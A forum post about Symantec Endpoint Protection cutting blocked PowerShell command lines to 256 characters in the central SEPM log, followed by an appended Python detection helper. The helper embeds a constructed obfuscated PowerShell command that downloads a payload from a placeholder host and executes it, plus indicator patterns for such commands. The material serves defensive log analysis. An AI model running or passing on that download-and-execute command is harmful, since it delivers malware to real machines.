Today, threats are downloaded by executing PowerShell. Some scripts create a new System.Net.WebClient object and call its DownloadFile method.
I have created an Application and Device Control policy with a rule to prevent running PowerShell from cmd.exe.
In a lab environment I ran a threat (an xls file with a macro).
SEP blocked the execution of PowerShell and logged the PowerShell command.
In SEP -> View Logs -> Client Management -> View Logs -> Control Log, the command/script has more than 500 characters. Example: setting the value of a variable with some parts of System.Net.WebClient, and finally joining them with Invoke-Expression.
In the SEPM console, in Monitors -> Logs -> Application and Device Control Logs: Application Control -> View Logs, the Description has only 256 characters :(
The central information does not match the same information in SEP. The command is truncated.
I have checked the documentation on the SEPM database schema: in table AGENT_BEHAVIOR_LOG_1, column DESCRIPTION is of type nvarchar(256). Can this column keep more data (in a future release of SEPM)?
Regards,
Tomasz
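As an added example (not from the original post or from Symantec), here is a small Python check modelled on the situation described above: it reproduces the 256-character limit of the SEPM DESCRIPTION column on a constructed command in the fragment-joining style the post mentions, rejoins the split strings so the WebClient/DownloadFile/Invoke-Expression indicators can be matched, and reports which indicators survive only in the client's Control Log. The sample command, the host example.invalid, and plain truncation as the column's behaviour are assumptions.

```python
import re

# Constructed scenario modelled on the post: the SEP client Control Log holds the full PowerShell
# command line, while SEPM's AGENT_BEHAVIOR_LOG_1.DESCRIPTION is nvarchar(256) and keeps at most 256 chars.
SEPM_DESCRIPTION_MAX = 256

# Constructed sample in the string-building style the post describes (WebClient assembled from
# fragments, then evaluated with Invoke-Expression); example.invalid is a placeholder host.
FULL_COMMAND = (
    "powershell.exe -ExecutionPolicy Bypass -NoProfile -NonInteractive -WindowStyle Hidden -Command "
    "$a='System.Net.'; $b='Web'+'Client'; $u='http://example.invalid/files/2019/payload.bin'; "
    "$p=$env:TEMP+'\\p.exe'; $c='(New-Object '+$a+$b+').DownloadFile($u,$p)'; "
    "Invoke-Expression $c; Start-Process $p"
)

CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")   # 'Web'+'Client'
ASSIGN = re.compile(r"\$(\w+)\s*=\s*('[^']*')")       # $b='WebClient'
INDICATORS = ("System.Net.WebClient", "DownloadFile", "Invoke-Expression", "IEX")


def sepm_description(full_command: str) -> str:
    """Model what the central log can store (assumption: plain truncation at the column width)."""
    return full_command[:SEPM_DESCRIPTION_MAX]

def is_possibly_truncated(description: str) -> bool:
    """A description that exactly fills the column must be re-read from the client's Control Log."""
    return len(description) >= SEPM_DESCRIPTION_MAX

def normalise(cmd: str) -> str:
    """Join quoted fragments and inline simple $var='literal' assignments until nothing changes,
    so 'System.Net.'+'Web'+'Client' becomes one searchable token. Best-effort, not a parser."""
    for _ in range(10):                                # bounded: guards against odd input
        before = cmd
        cmd = CONCAT.sub(lambda m: f"'{m.group(1)}{m.group(2)}'", cmd)
        for name, literal in ASSIGN.findall(cmd):
            cmd = re.sub(rf"\${name}\b", lambda _m, lit=literal: lit, cmd)
        if cmd == before:
            break
    return cmd

def find_indicators(cmd: str) -> list[str]:
    """Indicators present after normalisation, in INDICATORS order."""
    text = normalise(cmd)
    return [i for i in INDICATORS if re.search(rf"\b{re.escape(i)}\b", text, re.IGNORECASE)]

def lost_in_sepm(full_command: str) -> list[str]:
    """Indicators visible in the client log that the 256-character SEPM description drops."""
    central = find_indicators(sepm_description(full_command))
    return [i for i in find_indicators(full_command) if i not in central]
```

Running it on the constructed command shows that the client log still exposes Invoke-Expression while the SEPM description, cut at 256 characters, does not, which is exactly why a full-width description triggers a look at the client's Control Log.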